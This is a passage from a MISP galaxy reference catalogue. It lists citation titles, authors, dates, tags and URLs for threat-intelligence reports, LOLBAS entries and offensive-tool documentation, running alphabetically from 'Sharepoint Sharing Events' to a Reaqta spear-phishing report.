The tag is: misp-galaxy:references="Sharepoint Sharing Events"

Table 15374. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events

GitHub GhostPack Certificates

HarmJ0y. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022.

The tag is: misp-galaxy:references="GitHub GhostPack Certificates"

Table 15375. Table References

Links

https://github.com/GhostPack/SharpDPAPI#certificates

Shdocvw.dll - LOLBAS Project

LOLBAS. (2018, May 25). Shdocvw.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Shdocvw.dll - LOLBAS Project"

Table 15376. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/

Securelist Turla Oct 2018

Kaspersky Lab’s Global Research & Analysis Team. (2018, October 04). Shedding Skin – Turla’s Fresh Faces. Retrieved November 7, 2018.

The tag is: misp-galaxy:references="Securelist Turla Oct 2018"

Table 15377. Table References

Links

https://securelist.com/shedding-skin-turlas-fresh-faces/88069/

Shell32.dll - LOLBAS Project

LOLBAS. (2018, May 25). Shell32.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Shell32.dll - LOLBAS Project"

Table 15378. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Shell32/

Cylance Shell Crew Feb 2017

Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.

The tag is: misp-galaxy:references="Cylance Shell Crew Feb 2017"

Table 15379. Table References

Links

https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar

Magento

Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection Vector. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Magento"

Table 15380. Table References

Links

https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html

Trend Micro TA505 June 2019

Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="Trend Micro TA505 June 2019"

Table 15381. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/

Shimgvw.dll - LOLBAS Project

LOLBAS. (2021, January 6). Shimgvw.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Shimgvw.dll - LOLBAS Project"

Table 15382. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/

FireEye Shining A Light on DARKSIDE May 2021

FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="FireEye Shining A Light on DARKSIDE May 2021"

Table 15383. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

Telekom Security DarkGate August 25 2023

Fabian Marquardt. (2023, August 25). Shining some light on the DarkGate loader. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="Telekom Security DarkGate August 25 2023"

Table 15384. Table References

Links

https://github.security.telekom.com/2023/08/darkgate-loader.html

NCC Group Black Basta June 2022

Inman, R. and Gurney, P. (2022, June 6). Shining the Light on Black Basta. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="NCC Group Black Basta June 2022"

Table 15385. Table References

Links

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

Trustwave Cherry Picker

Merritt, E.. (2015, November 16). Shining the Spotlight on Cherry Picker PoS Malware. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="Trustwave Cherry Picker"

Table 15386. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/

Shlayer jamf gatekeeper bypass 2021

Jaron Bradley. (2021, April 26). Shlayer malware abusing Gatekeeper bypass on macOS. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Shlayer jamf gatekeeper bypass 2021"

Table 15387. Table References

Links

https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/

Shodan

Shodan. (n.d.). Shodan. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Shodan"

Table 15388. Table References

Links

https://shodan.io

Shortcut for Persistence

Elastic. (n.d.). Shortcut File Written or Modified for Persistence. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Shortcut for Persistence"

Table 15389. Table References

Links

https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence

Unprotect Shortcut

Unprotect Project. (2019, March 18). Shortcut Hiding. Retrieved October 3, 2023.

The tag is: misp-galaxy:references="Unprotect Shortcut"

Table 15390. Table References

Links

https://unprotect.it/technique/shortcut-hiding/

Sleep, shut down, hibernate

AVG. (n.d.). Should You Shut Down, Sleep or Hibernate Your PC or Mac Laptop?. Retrieved June 8, 2023.

The tag is: misp-galaxy:references="Sleep, shut down, hibernate"

Table 15391. Table References

Links

https://www.avg.com/en/signal/should-you-shut-down-sleep-or-hibernate-your-pc-or-mac-laptop

show_clock_detail_cisco_cmd

Cisco. (2023, March 6). show clock detail - Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.

The tag is: misp-galaxy:references="show_clock_detail_cisco_cmd"

Table 15392. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674

show_processes_cisco_cmd

Cisco. (2022, August 16). show processes - . Retrieved July 13, 2022.

The tag is: misp-galaxy:references="show_processes_cisco_cmd"

Table 15393. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760

show_run_config_cmd_cisco

Cisco. (2022, August 16). show running-config - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.

The tag is: misp-galaxy:references="show_run_config_cmd_cisco"

Table 15394. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_protocols_through_showmon.html#wp2760878733

Symantec Shuckworm January 2022

Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.

The tag is: misp-galaxy:references="Symantec Shuckworm January 2022"

Table 15395. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

Microsoft Shutdown Oct 2017

Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Microsoft Shutdown Oct 2017"

Table 15396. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown

MalwareBytes SideCopy Dec 2021

Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022.

The tag is: misp-galaxy:references="MalwareBytes SideCopy Dec 2021"

Table 15397. Table References

Links

https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure

Rewterz Sidewinder APT April 2020

Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.

The tag is: misp-galaxy:references="Rewterz Sidewinder APT April 2020"

Table 15398. Table References

Links

https://www.rewterz.com/threats/sidewinder-apt-group-campaign-analysis

Cyble Sidewinder September 2020

Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.

The tag is: misp-galaxy:references="Cyble Sidewinder September 2020"

Table 15399. Table References

Links

https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/

Microsoft Sigcheck May 2017

Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="Microsoft Sigcheck May 2017"

Table 15400. Table References

Links

https://docs.microsoft.com/sysinternals/downloads/sigcheck

Linux Signal Man

Linux man-pages. (2023, April 3). signal(7). Retrieved August 30, 2023.

The tag is: misp-galaxy:references="Linux Signal Man"

Table 15401. Table References

Links

https://man7.org/linux/man-pages/man7/signal.7.html

f-secure janicab

Brod. (2013, July 15). Signed Mac Malware Using Right-to-Left Override Trick. Retrieved July 17, 2017.

The tag is: misp-galaxy:references="f-secure janicab"

Table 15402. Table References

Links

https://www.f-secure.com/weblog/archives/00002576.html

Group IB Silence Aug 2019

Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="Group IB Silence Aug 2019"

Table 15403. Table References

Links

https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf

SecureList Silence Nov 2017

GReAT. (2017, November 1). Silence – a new Trojan attacking financial organizations. Retrieved May 24, 2019.

The tag is: misp-galaxy:references="SecureList Silence Nov 2017"

Table 15404. Table References

Links

https://securelist.com/the-silence/83009/

Cyber Forensicator Silence Jan 2019

Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.

The tag is: misp-galaxy:references="Cyber Forensicator Silence Jan 2019"

Table 15405. Table References

Links

https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/

Group IB Silence Sept 2018

Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="Group IB Silence Sept 2018"

Table 15406. Table References

Links

https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf

CrowdStrike Silent Chollima Adversary September 2021

CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CrowdStrike Silent Chollima Adversary September 2021"

Table 15407. Table References

Links

https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/

Malwarebytes Silent Librarian October 2020

Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Malwarebytes Silent Librarian October 2020"

Table 15408. Table References

Links

https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/

Phish Labs Silent Librarian

Hassold, Crane. (2018, March 26). Silent Librarian: More to the Story of the Iranian Mabna Institute Indictment. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Phish Labs Silent Librarian"

Table 15409. Table References

Links

https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment

GitHub SILENTTRINITY Modules July 2019

Salvati, M. (2019, August 6). SILENTTRINITY Modules. Retrieved March 24, 2022.

The tag is: misp-galaxy:references="GitHub SILENTTRINITY Modules July 2019"

Table 15410. Table References

Links

https://github.com/byt3bl33d3r/SILENTTRINITY/tree/master/silenttrinity/core/teamserver/modules/boo

Unit 42 Siloscape Jun 2021

Prizmant, D. (2021, June 7). Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments. Retrieved June 9, 2021.

The tag is: misp-galaxy:references="Unit 42 Siloscape Jun 2021"

Table 15411. Table References

Links

https://unit42.paloaltonetworks.com/siloscape/

Unit42 SilverTerrier 2016

Renals, P., Conant, S. (2016). SILVERTERRIER: The Next Evolution in Nigerian Cybercrime. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Unit42 SilverTerrier 2016"

Table 15412. Table References

Links

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf

Unit42 SilverTerrier 2018

Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Unit42 SilverTerrier 2018"

Table 15413. Table References

Links

https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise

Timac DYLD_INSERT_LIBRARIES

Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020.

The tag is: misp-galaxy:references="Timac DYLD_INSERT_LIBRARIES"

Table 15414. Table References

Links

https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/

SIM Swapping and Abuse of the Microsoft Azure Serial Console

Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack. Retrieved June 2, 2023.

The tag is: misp-galaxy:references="SIM Swapping and Abuse of the Microsoft Azure Serial Console"

Table 15415. Table References

Links

https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial

EduardosBlog SIPs July 2008

Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="EduardosBlog SIPs July 2008"

Table 15416. Table References

Links

https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/

Anonymous Hackers Deface Russian Govt Site

Andy. (2018, May 12). ‘Anonymous’ Hackers Deface Russian Govt. Site to Protest Web-Blocking (NSFW). Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Anonymous Hackers Deface Russian Govt Site"

Table 15417. Table References

Links

https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/

Dell Skeleton

Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.

The tag is: misp-galaxy:references="Dell Skeleton"

Table 15418. Table References

Links

https://www.secureworks.com/research/skeleton-key-malware-analysis

Command Five SK 2011

Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Command Five SK 2011"

Table 15419. Table References

Links

https://www.commandfive.com/papers/C5_APT_SKHack.pdf

Trend Micro Skidmap

Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.

The tag is: misp-galaxy:references="Trend Micro Skidmap"

Table 15420. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/

Detectify Slack Tokens

Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Detectify Slack Tokens"

Table 15421. Table References

Links

https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/

GitHub Sliver C2

BishopFox. (n.d.). Sliver. Retrieved September 15, 2021.

The tag is: misp-galaxy:references="GitHub Sliver C2"

Table 15422. Table References

Links

https://github.com/BishopFox/sliver/

GitHub Sliver C2 DNS

BishopFox. (n.d.). Sliver DNS C2 . Retrieved September 15, 2021.

The tag is: misp-galaxy:references="GitHub Sliver C2 DNS"

Table 15423. Table References

Links

https://github.com/BishopFox/sliver/wiki/DNS-C2

GitHub Sliver Download

BishopFox. (n.d.). Sliver Download. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Download"

Table 15424. Table References

Links

https://github.com/BishopFox/sliver/blob/7489c69962b52b09ed377d73d142266564845297/client/command/filesystem/download.go

GitHub Sliver File System August 2021

BishopFox. (2021, August 18). Sliver Filesystem. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="GitHub Sliver File System August 2021"

Table 15425. Table References

Links

https://github.com/BishopFox/sliver/tree/master/client/command/filesystem

GitHub Sliver HTTP

BishopFox. (n.d.). Sliver HTTP(S) C2. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver HTTP"

Table 15426. Table References

Links

https://github.com/BishopFox/sliver/wiki/HTTP(S)-C2

GitHub Sliver Ifconfig

BishopFox. (n.d.). Sliver Ifconfig. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Ifconfig"

Table 15427. Table References

Links

https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/network/ifconfig.go

GitHub Sliver Netstat

BishopFox. (n.d.). Sliver Netstat. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Netstat"

Table 15428. Table References

Links

https://github.com/BishopFox/sliver/tree/58a56a077f0813bb312f9fa4df7453b510c3a73b/implant/sliver/netstat

GitHub Sliver Screen

BishopFox. (n.d.). Sliver Screenshot. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Screen"

Table 15429. Table References

Links

https://github.com/BishopFox/sliver/blob/master/implant/sliver/screen/screenshot_windows.go

GitHub Sliver Encryption

BishopFox. (n.d.). Sliver Transport Encryption. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Encryption"

Table 15430. Table References

Links

https://github.com/BishopFox/sliver/wiki/Transport-Encryption

GitHub Sliver Upload

BishopFox. (n.d.). Sliver Upload. Retrieved September 16, 2021.

The tag is: misp-galaxy:references="GitHub Sliver Upload"

Table 15431. Table References

Links

https://github.com/BishopFox/sliver/blob/ea329226636ab8e470086a17f13aa8d330baad22/client/command/filesystem/upload.go

Zdnet Ngrok September 2018

Cimpanu, C. (2018, September 13). Sly malware author hides cryptomining botnet behind ever-shifting proxy service. Retrieved September 15, 2020.

The tag is: misp-galaxy:references="Zdnet Ngrok September 2018"

Table 15432. Table References

Links

https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/

NCSC GCHQ Small Sieve Jan 2022

NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="NCSC GCHQ Small Sieve Jan 2022"

Table 15433. Table References

Links

https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf

SmartMontools

smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.

The tag is: misp-galaxy:references="SmartMontools"

Table 15434. Table References

Links

https://www.smartmontools.org/

CME Github September 2018

byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020.

The tag is: misp-galaxy:references="CME Github September 2018"

Table 15435. Table References

Links

https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

US-CERT SMB Security

US-CERT. (2017, March 16). SMB Security Best Practices. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="US-CERT SMB Security"

Table 15436. Table References

Links

https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices

SMLoginItemSetEnabled Schroeder 2013

Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="SMLoginItemSetEnabled Schroeder 2013"

Table 15437. Table References

Links

https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/

Malwarebytes SmokeLoader 2016

Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.

The tag is: misp-galaxy:references="Malwarebytes SmokeLoader 2016"

Table 15438. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/

Talos Smoke Loader July 2018

Baker, B., Unterbrink H. (2018, July 03). Smoking Guns - Smoke Loader learned new tricks. Retrieved July 5, 2018.

The tag is: misp-galaxy:references="Talos Smoke Loader July 2018"

Table 15439. Table References

Links

https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html#more

FireEye SMOKEDHAM June 2021

FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="FireEye SMOKEDHAM June 2021"

Table 15440. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

Environmental Keyed HTA

Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019.

The tag is: misp-galaxy:references="Environmental Keyed HTA"

Table 15441. Table References

Links

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/

nccgroup Smuggling HTA 2017

Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved May 20, 2021.

The tag is: misp-galaxy:references="nccgroup Smuggling HTA 2017"

Table 15442. Table References

Links

https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/

Accenture SNAKEMACKEREL Nov 2018

Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.

The tag is: misp-galaxy:references="Accenture SNAKEMACKEREL Nov 2018"

Table 15443. Table References

Links

https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50

Sophos Snatch Ransomware 2019

Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="Sophos Snatch Ransomware 2019"

Table 15444. Table References

Links

https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/

AdSecurity SID History Sept 2015

Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="AdSecurity SID History Sept 2015"

Table 15445. Table References

Links

https://adsecurity.org/?p=1772

ADSecurity GPO Persistence 2016

Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="ADSecurity GPO Persistence 2016"

Table 15446. Table References

Links

https://adsecurity.org/?p=2716

Telefonica Snip3 December 2021

Jornet, A. (2021, December 23). Snip3, an investigation into malware. Retrieved September 19, 2023.

The tag is: misp-galaxy:references="Telefonica Snip3 December 2021"

Table 15447. Table References

Links

https://telefonicatech.com/blog/snip3-investigacion-malware

Security Joes Sockbot March 09 2022

Felipe Duarte, Ido Naor. (2022, March 9). Sockbot in GoLand. Retrieved September 22, 2023.

The tag is: misp-galaxy:references="Security Joes Sockbot March 09 2022"

Table 15448. Table References

Links

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

Kaspersky Sodin July 2019

Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Kaspersky Sodin July 2019"

Table 15449. Table References

Links

https://securelist.com/sodin-ransomware/91473/

Kaspersky Sofacy

Kaspersky Lab’s Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.

The tag is: misp-galaxy:references="Kaspersky Sofacy"

Table 15450. Table References

Links

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

Unit 42 Sofacy Feb 2018

Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.

The tag is: misp-galaxy:references="Unit 42 Sofacy Feb 2018"

Table 15451. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/

Unit 42 Sofacy Nov 2018

Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Unit 42 Sofacy Nov 2018"

Table 15452. Table References

Links

https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

Unit42 Cannon Nov 2018

Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.

The tag is: misp-galaxy:references="Unit42 Cannon Nov 2018"

Table 15453. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

Palo Alto Sofacy 06-2018

Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.

The tag is: misp-galaxy:references="Palo Alto Sofacy 06-2018"

Table 15454. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

F-Secure Sofacy 2015

F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="F-Secure Sofacy 2015"

Table 15455. Table References

Links

https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/

Sofacy Komplex Trojan

Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy’s 'Komplex' OS X Trojan. Retrieved July 8, 2017.

The tag is: misp-galaxy:references="Sofacy Komplex Trojan"

Table 15456. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Sofacy DealersChoice

Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.

The tag is: misp-galaxy:references="Sofacy DealersChoice"

Table 15457. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/

Unit 42 SolarStorm December 2020

Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.

The tag is: misp-galaxy:references="Unit 42 SolarStorm December 2020"

Table 15458. Table References

Links

https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/

Symantec Sunburst Sending Data January 2021

Symantec Threat Hunter Team. (2021, January 22). SolarWinds: How Sunburst Sends Data Back to the Attackers. Retrieved January 22, 2021.

The tag is: misp-galaxy:references="Symantec Sunburst Sending Data January 2021"

Table 15459. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data

Carnegie Mellon University Supernova Dec 2020

Carnegie Mellon University. (2020, December 26). SolarWinds Orion API authentication bypass allows remote command execution. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Carnegie Mellon University Supernova Dec 2020"

Table 15460. Table References

Links

https://www.kb.cert.org/vuls/id/843464

SolarWinds Advisory Dec 2020

SolarWinds. (2020, December 24). SolarWinds Security Advisory. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="SolarWinds Advisory Dec 2020"

Table 15461. Table References

Links

https://www.solarwinds.com/sa-overview/securityadvisory

solution_monitor_dhcp_scopes

Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved March 7, 2022.

The tag is: misp-galaxy:references="solution_monitor_dhcp_scopes"

Table 15462. Table References

Links

https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/

Sophos X-Ops Tweet September 13 2023

SophosXOps. (2023, September 13). Sophos X-Ops Tweet September 13 2023. Retrieved September 22, 2023.

The tag is: misp-galaxy:references="Sophos X-Ops Tweet September 13 2023"

Table 15463. Table References

Links

https://twitter.com/SophosXOps/status/1702051374287007923

Source Manual

ss64. (n.d.). Source or Dot Operator. Retrieved May 21, 2019.

The tag is: misp-galaxy:references="Source Manual"

Table 15464. Table References

Links

https://ss64.com/bash/source.html

Symantec Sowbug Nov 2017

Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Symantec Sowbug Nov 2017"

Table 15465. Table References

Links

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

NIST 800-63-3

Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019.

The tag is: misp-galaxy:references="NIST 800-63-3"

Table 15466. Table References

Links

https://pages.nist.gov/800-63-3/sp800-63b.html

Threatpost Hancitor

Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.

The tag is: misp-galaxy:references="Threatpost Hancitor"

Table 15467. Table References

Links

https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/

CheckPoint SpeakUp Feb 2019

Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="CheckPoint SpeakUp Feb 2019"

Table 15468. Table References

Links

https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/

Cyfirma Kimsuky Spear Phishing

Cyfirma. (2020, December 16). Spear Phishing Attack by N. Korean Hacking Group, Kimsuky. Retrieved October 30, 2023.

The tag is: misp-galaxy:references="Cyfirma Kimsuky Spear Phishing"

Table 15469. Table References

Links

https://www.cyfirma.com/outofband/n-korean-hacking-group-kimsuky-escalates-attacks/

Palo Alto Unit 42 OutSteel SaintBot February 2022

Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="Palo Alto Unit 42 OutSteel SaintBot February 2022"

Table 15470. Table References

Links

https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/

Zscaler Bazar September 2020

Sadique, M. and Singh, A. (2020, September 29). Spear Phishing Campaign Delivers Buer and Bazar Malware. Retrieved November 19, 2020.

The tag is: misp-galaxy:references="Zscaler Bazar September 2020"

Table 15471. Table References

Links

https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware

Reaqta MSXSL Spearphishing MAR 2018

Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Reaqta MSXSL Spearphishing MAR 2018"

Table 15472. Table References

Links

